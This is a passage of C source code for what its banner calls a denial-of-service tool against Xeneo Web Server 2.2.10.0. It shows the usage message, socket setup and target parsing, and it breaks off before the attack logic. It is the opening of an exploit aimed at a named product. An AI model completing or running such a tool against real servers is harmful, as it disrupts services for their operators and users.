39 {
40 printf("Xeneo Web Server 2.2.10.0 DoS\r\n <badpack3t@security-protocols.com>\r\n\r\n",
argv[0]);
41 printf("Tool Usage:\r\n %s <targetip> [targetport] (default is 80)\r\n\r\n",
argv[0]);
42 printf("www.security-protocols.com\r\n\r\n", argv[0]);
43 exit(1);
44 }
45
46
wVersionRequested = MAKEWORD(1, 1);
47 if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
48
49
target = argv[1];
50
51
//for default web attacks
52 port = 80;
53
54
if (argc >= 3) port = atoi(argv[2]);
55 bufsize = 512;
56 if (argc >= 4) bufsize = atoi(argv[3]);
57
58
mysocket = socket(AF_INET, SOCK_STREAM, 0);
59 if(mysocket==INVALID_SOCKET)
60 {
61 printf("Socket error!\r\n");
62 exit(1);
63 }
64
65
printf("Resolving Hostnames...\n");
66 if ((pTarget = gethostbyname(target)) == NULL)
67 {